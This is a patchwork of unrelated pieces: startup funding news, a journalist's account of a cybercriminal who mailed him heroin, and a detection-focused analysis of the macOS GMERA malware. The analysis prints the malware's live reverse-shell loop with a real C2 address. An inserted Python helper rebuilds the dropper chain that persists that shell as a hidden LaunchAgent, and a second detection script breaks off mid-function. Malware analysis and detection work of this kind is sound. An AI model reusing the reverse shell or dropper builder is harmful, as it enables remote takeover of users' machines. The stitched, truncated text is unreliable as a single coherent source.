India’s Darwinbox raises $15M to bring its HR tech platform to more Asian markets

An Indian SaaS startup, which is increasingly courting clients from outside the country, just raised a significant amount of capital to expand its business.

Hyderabad-based Darwinbox, which operates a cloud-based human resource management platform, said on Thursday it has raised $15 million in a new financing round. The Series B round — which moves the firm’s total raise to $19.7 million — was led by Sequoia India and saw participation from existing investors Lightspeed India Partners, Endiya Partners and 3one4 Capital.

More than 200 firms — including giants such as adtech firm InMobi, fintech startup Paytm, drink conglomerate Bisleri, automobile maker Mahindra, Kotak group and delivery firms Swiggy and Milkbasket — use Darwinbox’s HR platform to serve half a million of their employees in 50 nations, Rohit Chennamaneni, co-founder of Darwinbox, told TechCrunch in an interview.

The startup, which competes with giants such as SAP and Oracle, said its platform enables a high level of configurability and ease of use, and understands the needs of modern employees. “The employees today who have grown accustomed to using consumer-focused services such as Uber and Amazon are left disappointed in their experience with their own firm’s HR offerings,” said Gowthami Kanumuru, VP Marketing at Darwinbox, in an interview.

Darwinbox’s HR platform offers a range of features, including the ability for firms to offer their employees insurance and early salary as loans. Its platform also features social networks for employees within a company to connect and talk, as well as an AI assistant that allows them to apply for a leave or set up meetings with quick voice commands from their phone.

“The AI system is not just looking for certain keywords. If an employee tells the system he or she is not feeling well today, it automatically applies a leave for them,” she said.

Darwinbox’s platform is built to handle onboarding new employees, keep a tab on their performance, monitor attrition rate and maintain an ongoing feedback loop. Or as Kanumuru puts it, the entire “hiring to retiring” cycle.

One of Darwinbox’s clients is L&T, which is tasked with setting up subways in many Indian cities. L&T is using Darwinbox’s geo-fencing feature to log the attendance of employees. “They are not using a biometric punch machine, which is typically used by other firms. Instead, they just require their 1,200 employees to check in from the workplace using their phones,” said Kanumuru.


Additionally, Darwinbox is largely focusing on serving companies based in Asia as it believes Western companies’ solutions are not a great fit for people here, said Kanumuru. The startup began courting clients in Southeast Asian markets last year.

“Our growth is a huge validation for our vision,” she said. “Within six months of operations, we had the delivery giant Delhivery with over 23,000 employees use our platform.”

In a statement to TechCrunch, Dev Khare, a partner at Lightspeed Venture, said, “there is a new trend of SaaS companies targeting the India/SE Asia markets. This trend is gathering steam and is disproving the conventional wisdom that Asia-focused SaaS companies cannot get to be big companies. We firmly believe that Asia-focused SaaS companies can get to large impact value and become large and profitable. Darwinbox is one of these companies.”

Darwinbox’s Chennamaneni said the startup will use the fresh capital to expand its footprint in Indonesia, Malaysia, Thailand and other Southeast Asian markets. Darwinbox also will expand its product offerings to address more of employees’ needs. The startup is also looking to make its platform handle tasks such as booking flights and hotels.

Chennamaneni, an alum of Google and McKinsey, said Darwinbox aims to double the number of clients it has in the next six to nine months.

Battlefield vets StrongSalt (formerly OverNest) announces $3M seed round

StrongSalt, then known as OverNest, appeared at the TechCrunch Disrupt NYC Battlefield in 2016, and announced a product for searching encrypted code, which remains unusual to this day. Today, the company announced a $3 million seed round led by Valley Capital Partners.

StrongSalt founder and CEO Ed Yu says encryption remains a difficult proposition, and that when you look at the majority of breaches, encryption wasn’t used. He said that his company wants to simplify adding encryption to applications, and came up with a new service to let developers add encryption in the form of an API. “We decided to come up with what we call an API platform. It’s like infrastructure that allows you to integrate our solution into any existing or any new applications,” he said.

The company’s original idea was to create a product to search encrypted code, but Yu says the tech has much more utility as an API that’s applicable across applications, and that’s why they decided to package it as a service. It’s not unlike Twilio for communications or Stripe for payments, except in this case you can build in searchable encryption.

The searchable part is actually a pretty big deal because, as Yu points out, when you encrypt data it is no longer searchable. “If you encrypt all your data, you cannot search within it, and if you cannot search within it, you cannot find the data you’re looking for, and obviously you can’t really use the data. So we actually solved that problem,” he said.

Developers can add searchable encryption as part of their applications. For customers already using a commercial product, the company’s API actually integrates with popular services, enabling customers to encrypt the data stored there, while keeping it searchable.

“We will offer a storage API on top of Box, AWS S3, Google Cloud, Azure — depending on what the customer has or wants. If the customer already has AWS S3 storage, for example, then when they use our API, and after encrypting the data, it will be stored in their AWS repository,” Yu explained.

For those companies that don’t have a storage service, the company is offering one. What’s more, they are using the blockchain to provide a mechanism for sharing, auditing and managing encrypted data. “We also use the blockchain for sharing data by recording the authorization by the sender, so the receiver can retrieve the information needed to reconstruct the keys in order to retrieve the data. This simplifies key management in the case of sharing and ensures auditability and revocability of the sharing by the sender,” Yu said.

If you’re wondering how the company has been surviving since 2016, while only getting its seed round today, it had a couple of small seed rounds prior to this, and a contract with the U.S. Department of Defense, which replaced the need for substantial earlier funding.

“The DOD was looking for a solution to have secure communication between computers, and they needed to have a way to securely store data, and so we were providing a solution for them,” he said. In fact, this work was what led them to build the commercial API platform they are offering today.

The company, which was founded in 2015, currently has 12 employees spread across the globe.

MediaRadar’s new product helps event organizers maximize sales

MediaRadar CEO Todd Krizelman describes his company as having “a very specific objective, which is to help media salespeople sell more advertising” by providing them with crucial data. And with today’s launch of MediaRadar Events, Krizelman hopes to do something similar for event organizers.

These customer groups might actually be one and the same, as plenty of companies (including TechCrunch) see both advertising and events as part of their business. In fact, Krizelman said customer demand “basically pushed us into this business.”

He also suggested that after years of seeing traditional ad dollars shifting into digital, “the money is now moving out of digital into events.”

If you’re organizing a trade show, you can use MediaRadar Events to learn about the overall size of the market, and then see who’s been purchasing sponsorships and exhibitor booths at similar events.

The product doesn’t just tell you who to reach out to, but how much these companies have paid for booths and sponsorships in the past, whether there are seasonal patterns in their conference spending and how that spending fits into their overall marketing budget — after all, Krizelman said, “In 2019, very few companies are siloed by media format as a buyer or a seller. Anyone doing that is putting their business at risk.”

He also described collecting the data needed to power MediaRadar Events as “much more complicated than we expected,” which is why it took the team two years to build the product. He said that data comes from three sources — some of it is posted publicly by event organizers, some is shared directly by the event organizers with MediaRadar and, in some cases, members of the MediaRadar team will attend the events themselves.

MediaRadar Events supports a wide range of events, although Krizelman acknowledged that it doesn’t have data for every industry. For example, he suggested that a convention for coin-operated laundromat owners might be “too niche” (though he hastened to add that he meant no offense to the laundromat business).

In a statement, James Ogle — chief financial officer at Access Intelligence (which owns the LeadsCon conference and publications like AdExchanger) — said:

Hosting events and the resulting revenue that comes from them is a big part of our business. However, the event space is getting more and more crowded and also more niche. Relevancy equals value, so we want to make sure our attendees are within the right target market for our exhibitors. MediaRadar provides critical transparency into the marketplace.

Interview With the Guy Who Tried to Frame Me for Heroin Possession

In April 2013, I received via U.S. mail more than a gram of pure heroin as part of a scheme to get me arrested for drug possession. But the plan failed and the Ukrainian mastermind behind it soon after was imprisoned for unrelated cybercrime offenses. That individual recently gave his first interview since finishing his jail time here in the states, and he’s shared some select (if often abrasive and coarse) details on how he got into cybercrime and why. Below are a few translated excerpts.

When I first encountered now-31-year-old Sergei “Fly,” “Flycracker,” “MUXACC” Vovnenko in 2013, he was the administrator of the fraud forum “thecc[dot]bz,” an exclusive and closely guarded Russian language board dedicated to financial fraud and identity theft.

Many of the heavy-hitters from other fraud forums had a presence on Fly’s forum, and collectively the group financed and ran a soup-to-nuts network for turning hacked credit card data into mounds of cash.

Vovnenko first came onto my radar after his alter ego Fly published a blog entry that led with an image of my bloodied, severed head and included my credit report, copies of identification documents, pictures of our front door, information about family members, and so on. Fly had invited all of his cybercriminal friends to ruin my financial identity and that of my family.

Somewhat curious about what might have precipitated this outburst, I was secretly given access to Fly’s cybercrime forum and learned he’d freshly hatched a plot to have heroin sent to my home. The plan was to have one of his forum lackeys spoof a call from one of my neighbors to the police when the drugs arrived, complaining that drugs were being delivered to our house and being sold out of our home by Yours Truly.

Thankfully, someone on Fly’s forum also posted a link to the tracking number for the drug shipment. Before the smack arrived, I had a police officer come out and take a report. After the heroin showed up, I gave the drugs to the local police and wrote about the experience in Mail From the Velvet Cybercrime Underground.

Angry that I’d foiled the plan to have me arrested for being a smack dealer, Fly or someone on his forum had a local florist send a gaudy floral arrangement in the shape of a giant cross to my home, complete with a menacing message that addressed my wife and was signed, “Velvet Crabs.”

The floral arrangement that Fly or one of his forum lackeys had delivered to my home in Virginia.

Vovnenko was arrested in Italy in the summer of 2014 on identity theft and botnet charges, and spent some 15 months in arguably Italy’s worst prison contesting his extradition to the United States. Those efforts failed, and he soon pleaded guilty to aggravated identity theft and wire fraud, and spent several years bouncing around America’s prison system.

Although Vovnenko sent me a total of three letters from prison in Naples (a hand-written apology letter and two friendly postcards), he never responded to my requests to meet him following his trial and conviction on cybercrime charges in the United States. I suppose that is fair: To my everlasting dismay, I never responded to his Italian dispatches (the first I asked to be professionally analyzed and translated before I would touch it).

Seasons greetings from my pen pal, Flycracker.

After serving his 41-month sentence in the U.S., Vovnenko was deported, although it’s unclear where he currently resides (the interview excerpted here suggests he’s back in Italy, but Fly doesn’t exactly confirm that).

In an interview published on the Russian-language security blog Krober[.]biz, Vovnenko said he began stealing early in life, and by 13 was already getting picked up for petty robberies and thefts.

A translated English version of the interview was produced and shared with KrebsOnSecurity by analysts at New York City-based cyber intelligence firm Flashpoint.

Sometime in the mid-aughts, Vovnenko settled with his mother in Naples, Italy, but he had trouble keeping a job for more than a few days. Until a chance encounter led to a front job at a den of thieves.

“When I came to my Mom in Naples, I could not find a permanent job. Having settled down somewhere at a new job, I would either get kicked out or leave in the first two days. I somehow didn’t succeed with employment until I was invited to work in a wine shop in the historical center of Naples, where I kinda had to wipe the dust from the bottles. But in fact, the wine shop turned out to be a real den and a sales outlet of hashish and crack. So my job was to be on the lookout and whenever the cops showed up, take a bag of goods and leave under the guise of a tourist.”

Cocaine and hash were plentiful at his employer’s place of work, and Vovnenko said he availed himself of both abundantly. After he’d saved enough to buy a computer, Fly started teaching himself how to write programs and hack stuff. He quickly became enthralled with the romanticized side of cybercrime — the allure of instant cash — and decided this was his true vocation.

“After watching movies and reading books about hackers, I really wanted to become a sort of virtual bandit who robs banks without leaving home,” Vovnenko recalled. “Once, out of curiosity, I wrote an SMS bomber that used a registration form on a dating site, bypassing the captcha through some kind of rookie mistake in the shitty code. The bomber would launch from the terminal and was written in Perl, and upon completion of its work, it gave out my phone number and email. I shared the bomber somewhere on one of my many awkward sites.”

“And a couple of weeks later they called me. Nah, not the cops, but some guy who comes from Sri Lanka who called himself Enrico. He told me that he used my program and earned a lot of money, and now he wants to share some of it with me and hire me. By a happy coincidence, the guy also lived in Naples.”

“When we met in person, he told me that he used my bomber to fuck with a telephone company called Wind. This telephone company had such a bonus service: for each incoming SMS you received two cents on the balance. Well, of course, this guy bought a bunch of SIM cards and began to bomb them, getting credits and loading them into his paid lines, similar to how phone sex works.”

But his drug habit soon interfered with his job, and he was let go.

“At the meeting, Enrico gave me 2K euros, and this was the first money I’ve earned, as it is fashionable to say these days, on ‘cybercrime’. I left my previous job and began to work closely with Enrico. But always stoned out of my mind, I didn’t do a good job and struggled with drug addiction at that time. I was addicted to cocaine, as a result, I was pulling a lot more money out of Enrico than my work brought him. And he kicked me out.”

After striking out on his own, Vovnenko says he began getting into carding big time, and was introduced to several other big players on the scene. One of those was a cigarette smuggler who used the nickname Ponchik (“Doughnut”).

I wonder if this is the same Ponchik who was arrested in 2013 as being the mastermind behind the Blackhole exploit kit, a crimeware package that fueled an overnight explosion in malware attacks via Web browser vulnerabilities.

In any case, Vovnenko had settled on some schemes that were generating reliably large amounts of cash.

“I’ve never stood still and was not focusing on carding only, with the money I earned, I started buying dumps and testing them at friends’ stores,” Vovnenko said. “Mules, to whom I signed the hotlines, were also signed up for cashing out the loads, giving them a mere 10 percent for their work. Things seemed to be going well.”

FAN MAIL

There is a large chronological gap in Vovnenko’s account of his cybercrime life story from that point on until the time he and his forum friends started sending heroin, large bags of feces and other nasty stuff to our Northern Virginia home in 2013.

Vovnenko claims he never sent anything and that it was all done by members of his forum.

-Tell me about the packages to Krebs.
“That ain’t me. Suitcase filled with sketchy money, dildoes, and a bouquet of coffin wildflowers. They sent all sorts of crazy shit. Forty or so guys would send. When I was already doing time, one of the dudes sent it. By the way, Krebs wanted to see me. But the lawyer suggested this was a bad idea. Maybe he wanted to look into my eyes.”

In one part of the interview, Fly is asked about but only briefly touches on how he was caught. I wanted to add some context here because this part of the story is richly ironic, and perhaps a tad cathartic.

Around the same time Fly was taking bitcoin donations for a fund to purchase heroin on my behalf, he was also engaged to be married to a nice young woman. But Fly apparently did not fully trust his bride-to-be, so he had malware installed on her system that forwarded him copies of all email that she sent and received.

Fly/Flycracker discussing the purchase of a gram of heroin from Silk Road seller “10toes.”

But Fly would make at least two big operational security mistakes in this spying effort: First, he had his fiancée’s messages forwarded to an email account he’d used for plenty of cybercriminal stuff related to his various “Fly” identities.

Mistake number two: the password for that email account was the same as the one for one of his cybercrime forum admin accounts. And unbeknownst to him at the time, that forum was hacked, with all email addresses and hashed passwords exposed.

Soon enough, investigators were reading Fly’s email, including the messages forwarded from his wife’s account that had details about their upcoming nuptials, such as shipping addresses for their wedding-related items and the full name of Fly’s fiancée. It didn’t take long to zero in on Fly’s location in Naples.

While it may sound unlikely that a guy so enmeshed in the cybercrime space could make such rookie security mistakes, I have found that a great many cybercriminals actually have worse operational security than the average Internet user.

I suspect this may be because the nature of their activities requires them to create vast numbers of single- or brief-use accounts, and in general they tend to re-use credentials across multiple sites, or else pick very poor passwords — even for critical resources.

In addition to elaborating on his hacking career, Fly talks a great deal about his time in various prisons (including their culinary habits), and an apparent longing or at least lingering fondness for the whole carding scene in general.

Towards the end, Fly says he’s considering going back to school, and that he may even take up information security as a course of study. I wish him luck in that endeavor, whatever it turns out to be, as long as he can also avoid stealing from people.

I don’t know what I would have written many years ago to Fly had I not been already so traumatized by receiving postal mail from him. Perhaps it would go something like this:

“Dear Fly: Thank you for your letters. I am very sorry to hear about the delays in your travel plans. I wish you luck in all your endeavors — and I sincerely wish the next hopeful opportunity you alight upon does not turn out to be a pile of shit.”

The entire translated interview is here (PDF). Fair warning: Many readers may find some of the language and topics discussed in the interview disturbing or offensive.

Detecting macOS.GMERA Malware Through Behavioral Inspection

Last week, researchers at Trend Micro spotted a new piece of in-the-wild macOS malware that spoofs a genuine stock market trading app to open a backdoor and run malicious code. In this post, we first give an overview of how the malware works, and then use this as an example to discuss different detection and response strategies, with a particular emphasis on explaining the principles and advantages of using behavioral detection on macOS.


An Overview of GMERA Malware

Let’s begin by taking a look at the technical details of this new piece of macOS malware. 

Two variants were initially discovered by researchers who identified them as GMERA.A and GMERA.B. In this post, we will focus on the interesting points in a particular sample of GMERA.B that pertain to detection and response. 

Our sample, which was not analyzed in the previous research, is:

d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Despite having been on VirusTotal for nine days already, and despite the initial Trend Micro research hitting the news five days ago, this particular sample remains undetected by the reputation engines on the VT site as of today.

image of undetected virus total

As with the GMERA.A variant, the malware comes in a macOS application bundle named “Stockfoli.app”. The name is a letter shy of a genuine app called “Stockfolio.app”, which the malware purports to be a copy of, and which is placed inside the malicious Stockfoli.app’s Resources folder.

image of terminal resources dir

The Stockfolio.app inside the Resources folder appears to be an undoctored version of the genuine app, save for the fact that the malware authors have replaced the original developer’s code signature with their own. We will come back to code signing in the next section.

Of particular note in the Resources folder is the malicious run.sh script. 

image of run shell script

We can see that in this sample the script contains a block of lightly obfuscated base64 which, once decoded, it writes out as a hidden property list file in the ~/Library/LaunchAgents folder, in this case under the file name .com.apple.upd.plist.

Decoding that base64 shows that the dropped property list itself contains a further base64-encoded blob in its ProgramArguments.

image of launch agent decoded

Further decoding reveals a bash script that opens a reverse shell to the attackers’ C2.

while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done

On each pass through the loop the script first sleeps for 10000 seconds (roughly 2.8 hours), so the initial callback is delayed by that long. It then quits any existing screen session and kills whatever process is holding port 25733, before using the screen utility to start a fresh session in ‘detached’ mode. Inside that session an interactive bash (bash -i) has its standard output redirected to bash’s /dev/tcp pseudo-device for 193.37.212.176 on port 25733 and its standard input duplicated from the same socket (0>&1), which gives the attacker a reverse shell. Because the session is detached, the shell survives if the attacker’s terminal disconnects, and the outer loop re-establishes the connection on its next iteration. In their write-up, the Trend Micro researchers reported seeing the reverse shell used over ports 25733 through 25736. Disassembly of the main binary in our sample shows that two further ports, 25737 and 25738, may also be utilized, with the latter used with zsh rather than bash as the shell of choice.

image of hopper and ports
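To make the layering concrete, here is an added Python triage helper, not code from the original post and not the malware’s own, that peels nested base64 out of a dropper, parses the LaunchAgent plist it writes, and pulls the C2 host and port out of the bash /dev/tcp redirection. Because run.sh is shown above only as a screenshot, the script builds a constructed stand-in for it; the plist Label, the echo|base64 wrapper and the launchctl line are assumptions, while the innermost script and the 193.37.212.176:25733 endpoint are exactly those decoded above.

```python
"""Unpack a GMERA-style dropper chain: run.sh -> hidden LaunchAgent -> bash.

Added triage helper; not code from the original post and not the malware's
own. The real run.sh appears in the post only as a screenshot, so
build_sample_dropper() CONSTRUCTS a stand-in that mirrors the described
layering (base64 plist written to ~/Library/LaunchAgents/.com.apple.upd.plist,
whose ProgramArguments carry more base64 that decodes to the reverse shell).
The plist Label and the echo|base64 wrapper are assumptions; the innermost
script and the C2 193.37.212.176:25733 are exactly as decoded in the post.
"""
import base64
import binascii
import plistlib
import re
from typing import List, Optional, Tuple

REVERSE_SHELL = ("while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; "
                 "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25733 0>&1'; done")
AGENT_PATH = "~/Library/LaunchAgents/.com.apple.upd.plist"   # file name from the post

B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")    # long runs worth trying to decode
DEV_TCP = re.compile(rb"/dev/tcp/([0-9.]+)/([0-9]+)")    # bash network redirection target
REDIRECT = re.compile(rb">\s*(\S+/LaunchAgents/\S+\.plist)")  # where run.sh writes the agent


def build_sample_dropper() -> bytes:
    """CONSTRUCTED run.sh look-alike; only the nesting is modelled, not the real text."""
    inner = base64.b64encode(REVERSE_SHELL.encode()).decode()
    agent = {
        "Label": "com.apple.upd",   # assumed; the real label is not shown in the post
        "ProgramArguments": ["/bin/bash", "-c", f"echo {inner} | base64 -D | bash"],
        "RunAtLoad": True,
    }
    outer = base64.b64encode(plistlib.dumps(agent)).decode()
    return (f'echo "{outer}" | base64 -D > {AGENT_PATH}\n'
            f"launchctl load {AGENT_PATH}\n").encode()


def peel_base64(blob: bytes, max_depth: int = 8) -> List[bytes]:
    """Decode every base64 run found, then repeat on the results; outermost first."""
    layers: List[bytes] = []
    frontier = [blob]
    for _ in range(max_depth):
        found = []
        for chunk in frontier:
            for token in B64_TOKEN.findall(chunk):
                try:
                    found.append(base64.b64decode(token, validate=True))
                except (binascii.Error, ValueError):
                    continue   # a long path or identifier, not base64
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def extract_c2(script: bytes) -> Optional[Tuple[str, int]]:
    """Pull host and port out of a bash /dev/tcp redirection, if present."""
    m = DEV_TCP.search(script)
    return (m.group(1).decode(), int(m.group(2))) if m else None


def triage(dropper: bytes) -> dict:
    """Summarize what the dropper persists, where, and who it calls back to."""
    layers = peel_base64(dropper)
    m = REDIRECT.search(dropper)
    report = {"layers": len(layers), "agent_path": m.group(1).decode() if m else None,
              "agent": None, "c2": None}
    for layer in layers:
        head = layer.lstrip()[:8]
        if head.startswith(b"<?xml") or head.startswith(b"bplist"):
            report["agent"] = plistlib.loads(layer)   # the dropped LaunchAgent
        report["c2"] = report["c2"] or extract_c2(layer)
    return report


if __name__ == "__main__":
    r = triage(build_sample_dropper())
    print(f"{r['layers']} base64 layers; agent {r['agent_path']}; C2 {r['c2']}")
```

Run against a real run.sh, peel_base64() stops as soon as a layer yields no further decodable runs, so a double- or triple-encoded payload is unpacked without knowing the depth in advance; the /dev/tcp extraction is the piece to widen (for example to zsh’s ztcp or nc invocations) if the threat actor changes shells, as the disassembly above suggests they may.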

Before we move on to discuss detection and response, let’s note one further characteristic of the malware not pointed out in the previous research. The malicious Stockfoli.app’s Info.plist is being distributed with at least two different bundle identifiers (we’re sure there will be more). These are:

com.appIe.stockf.stocks
com.appIe.stockfolioses.Stockfoli

Looked at casually, those appear to begin with ‘com.apple’. Closer inspection (or changing the font) reveals that the ‘l’ in “apple” is in fact a capital “I”: the identifiers read com.appIe, not com.apple.

We will come back to the reason for this ruse below. 

CERT REVOKED WHACK-A-MOLE

Let’s turn to detection and response. If you’re a Mac user running an unprotected Mac (i.e., you’re not using a Next-Gen solution like SentinelOne), you might be glad to hear that these malicious samples should now fail to launch if you download and run them. That’s because Apple have since revoked the signing certificate used to sign these samples, so Gatekeeper will refuse them.

image of cert revoked

While it’s great to see Apple on the ball and revoking the signatures of known malware, this kind of after-the-fact protection shouldn’t provide as much comfort as some seem to take from it. A fellow macOS enthusiast remarked to me after this latest discovery that Apple’s action proved to him that Macs are secure against malware, to which my somewhat more circumspect response was: how long was this malware in the wild before it was discovered and the signature revoked? How many users were infected by this malware before it became publicly known? How many unknown, validly signed malware samples are still out there?

It won’t be long before the threat actors package their wares in a newly signed bundle and the game of whack-a-mole begins again: attackers create and distribute a malicious app with a valid code signature; after some variable amount of time in the wild, the malware is discovered and Apple revoke the signature; the attackers then repackage the malware with a fresh signature and the process begins all over again!

If you’re the victim, a day, an hour, or even a minute is too late if you’re relying on this kind of mechanism to protect you. In fact, it inherently relies on some people becoming victims in order for samples to be discovered and signatures revoked in the first place. Cold comfort if you’re one of the unfortunate early victims!

Perhaps not widely appreciated is just how easy it is for bad actors to acquire valid code signing identities. Given the rewards, they are quite happy to burn $99 Apple Developer Program subscriptions and play whack-a-mole with Apple. This is relatively easy to do, as there are many fake and compromised (i.e., hacked) Apple IDs that can be enrolled as developer identities using stolen credit cards and other payment methods.

Repackaging the same malicious script inside a new app bundle with a new cert is a task that can be automated with very little effort; it is a technique we see the commodity adware and PUP players use on a daily basis.

YARA YARA, YADA YADA…

To be fair, Apple don’t just rely on revoking certs of discovered malware though. Indeed, they have been talking a lot about ‘defense in depth’ recently (WWDC 2019), and as regular readers of this blog will know, Apple have a suite of built-in tools like Gatekeeper, XProtect and MRT to help block and remediate known malware. With the upcoming Catalina release, Apple will add compulsory notarization to their armoury, too.

These tools rely on a combination of different strategies, from extended file attributes, hardcoded file paths and hashes to Yara rules that specify particular characteristics of a binary. While hashes and file paths are typically limited to a single variant of malware, Yara rules at least have the advantage that they can be used to identify families of malware that share similar characteristics. Here’s an example from XProtect:

image of xprotect yara rule

This Yara rule specifies five sets of strings; if all of them appear in a Mach-O executable smaller than 200KB, XProtect blocks the file as a member of the malware family MACOS.6175e25. Let’s translate those strings from hex to see what they actually are:

image of decoded xprotect yara rule strings

To be clear, this rule has nothing to do with the GMERA malware under discussion here. At the time of writing, neither XProtect nor MRT.app have been updated to detect GMERA malware. The point here is to show how Yara rules in general work. The rule shown above is in fact for some malware we’ve reversed before. From the malware author’s point of view, it is easy to see just what XProtect is hitting on, and with that knowledge, to adapt his or her work. 

But wouldn’t that be difficult? Not at all. It’s far less work for malware authors than it is for Apple. A simple trick for malware authors to use to avoid Yara rules like the above is simply to rename methods (it would only take a letter different to break that rule above), or to use an encoding like base64, which can be encoded multiple times. There really are numerous ways to make minor changes that will break Yara rules. Meanwhile, Apple (and 3rd party security vendors that rely on the same techniques) have to wait until the changes come to light, then test and update their revised signatures. All the while, the threat actors are achieving compromises while Apple and other vendors continually have to play catch-up, knowing full-well that their updated signatures will be obsolete within hours.

A crucial part of this unwinnable game is that, as with revoking certs, file paths, hashes and Yara rules all have one fatal weakness: they rely on prior discovery of a sample. Once again, after-the-fact detection is no solace for the before-everyone-else-heard-about-it victims.

Beating macOS Malware By Detecting Suspicious Behavior

Fortunately, there is another way to detect and block malware which doesn’t rely on prior knowledge. Malware and threat actors have limited and specific goals. While the implementation details can be vast and varied, the actual behavior required to meet those objectives is both finite and definable. With a behavioral detection engine, the implementation details become secondary.

Just as we do not detect criminals by looking at the way their brains are wired or measuring the shape and size of their skulls (anymore!) but rather by assessing the way they act against expected social and legal norms, so we can do the same with malicious software, scripts and processes. 

Regardless of the inner wiring, malicious processes – like criminals – engage in certain kinds of undesirable behavior. By tracking and contextualizing individual events in the process lifecycle, we can put together a picture or ‘story’ that says:

“Taken together, these events constitute undesirable behavior and we should alert on and/or block them.”

By focusing on dynamic behavior rather than relying on static characteristics like strings, hashes and paths, we can identify malware even if we have not seen its particular implementation previously.

This is the principle behind SentinelOne’s behavioral and AI engines. Although I can’t go into the actual details of how SentinelOne does its magic under the hood, we can get a sense of how behavioral detection works in principle by looking at the GMERA malware as an example. 

As we have seen, the macOS.GMERA malware writes a persistence agent to ~/Library/LaunchAgents. If you were manually threat hunting on macOS, a newly written LaunchAgent would immediately cause you to investigate further, and the same can be true for automated responses. We also saw that in the case of the GMERA malware, the parent process dropped a persistence agent that was made invisible in the Finder by prefixing a period to the filename. 

image of hidden launch agent

That should raise our suspicion even further. Such behavior is not only unusual for legitimate software but is also behavior that has no legitimate purpose. The primary reason for allowing processes to write invisible files is to hide temporary data and metadata that have no conceivable interest to the user. While there may be a few other legitimate uses (such as DRM licensing and the like), there’s little reason why a genuine persistence agent should be invisible to the user in the Finder.

Thirdly, this LaunchAgent’s behavior itself is anomalous. Rather than executing a file at a given path, it decodes and executes in memory a script that is obfuscated with base64. While there’s no doubt some conceivable edge case where this might be legitimate, in the typical enterprise situation such behaviour is almost certainly designed to deceive and something we should be alerting on. Even the edge cases are worthy of our attention, if only to encourage wayward users to engage in better, safer and more transparent practices.

Finally, as we noted above, the parent application uses a bundle Identifier that is clearly intended to mislead. 

This is a sleight-of-hand intended to trick unwary users, who may easily overlook such a process as benign. The tactic may also trick some unsophisticated security solutions that check whether processes with a “com.apple” bundle identifier are actually signed with Apple’s signature. Replacing the ‘l’ in Apple with a capital ‘I’ would neatly sidestep such a heuristic. 

If you were writing a detection engine, you might consider that as something to look out for – homograph attacks are a tried and trusted technique in URL and Domain Name spoofing – but you might equally well not care either way. It matters less what a file is called and more what it does. A hidden persistence mechanism opening a reverse shell in memory that has been dropped by an application with no apparent functional relation? What could be more suspicious than that?
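The four observations just walked through, assembled into the kind of process-lifecycle “story” described earlier, as an added Python example. This is not SentinelOne’s engine and not code from the original post: it models a tiny behavioral correlator that attaches each suspicious event to the process lineage that produced it and judges the lineage as a whole rather than any single file name. The event records, the `/Users/alice/...` paths, the bundle identifier `com.appIe.stockfoli` (capital I for lowercase l, as the text describes) and both plists are constructed for illustration; the embedded base64 payload is a harmless `echo hello`.

```python
"""Behavioral triage of a LaunchAgent drop, modelled on the GMERA story.

Added example (not the original post's or SentinelOne's code). It assumes a
stream of process-lifecycle event dicts such as an endpoint sensor might emit,
with the written bytes available for file-write events. All data is constructed.
"""
import plistlib
import re

# Constructed: a hidden LaunchAgent that decodes base64 and pipes it to sh.
# The payload is base64("echo hello"), chosen to be harmless.
HIDDEN_AGENT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>echo ZWNobyBoZWxsbw== | base64 --decode | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

# Constructed: an ordinary, visible LaunchAgent that runs a file at a path.
VISIBLE_AGENT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.sync</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/ExampleSync.app/Contents/MacOS/ExampleSync</string>
  </array>
</dict></plist>
"""

# Constructed events in the shape of the GMERA chain: a misleadingly named app
# runs a bundled script, which drops a hidden, base64-wrapped LaunchAgent.
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 501, "ppid": 1,
     "image": "/Applications/Stockfoli.app/Contents/MacOS/Stockfoli",
     "bundle_id": "com.appIe.stockfoli"},                       # capital I
    {"type": "exec", "pid": 502, "ppid": 501, "image": "/bin/sh",
     "argv": ["/bin/sh", "/Applications/Stockfoli.app/Contents/Resources/run.sh"]},
    {"type": "file_write", "pid": 502,
     "path": "/Users/alice/Library/LaunchAgents/.com.example.agent.plist",
     "content": HIDDEN_AGENT_PLIST},
]

# Constructed events for a legitimate installer writing a visible LaunchAgent.
LEGIT_INSTALL_EVENTS = [
    {"type": "exec", "pid": 601, "ppid": 1,
     "image": "/Applications/ExampleSync.app/Contents/MacOS/ExampleSync",
     "bundle_id": "com.example.sync"},
    {"type": "file_write", "pid": 601,
     "path": "/Users/alice/Library/LaunchAgents/com.example.sync.plist",
     "content": VISIBLE_AGENT_PLIST},
]

DECODE_RE = re.compile(r"base64\s+(-D|-d|--decode)")       # macOS -D, GNU -d
EXEC_RE = re.compile(r"\|\s*(sh|bash|zsh)\b|\beval\b")      # decoded text fed to a shell
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})


def is_launch_agent_path(path):
    """True for a plist written under any .../Library/LaunchAgents/ directory."""
    return "/Library/LaunchAgents/" in path and path.endswith(".plist")


def is_hidden_path(path):
    """True when the file name itself is dot-prefixed (invisible in Finder)."""
    return path.rsplit("/", 1)[-1].startswith(".")


def decodes_and_executes(program_args):
    """True when ProgramArguments decode base64 and hand the result to a shell."""
    cmd = " ".join(program_args)
    return bool(DECODE_RE.search(cmd) and EXEC_RE.search(cmd))


def bundle_id_spoofs_apple(bundle_id):
    """True when the prefix reads as com.apple only after confusable substitution."""
    raw = bundle_id.lower().split(".")[:2]
    normalized = bundle_id.translate(CONFUSABLES).lower().split(".")[:2]
    return normalized == ["com", "apple"] and raw != ["com", "apple"]


def triage(events):
    """Attach each suspicious observation to its process lineage and judge the
    lineage as a whole. Returns {root_pid: {"findings": [...], "verdict": ...}}."""
    parent, findings = {}, []
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "exec":
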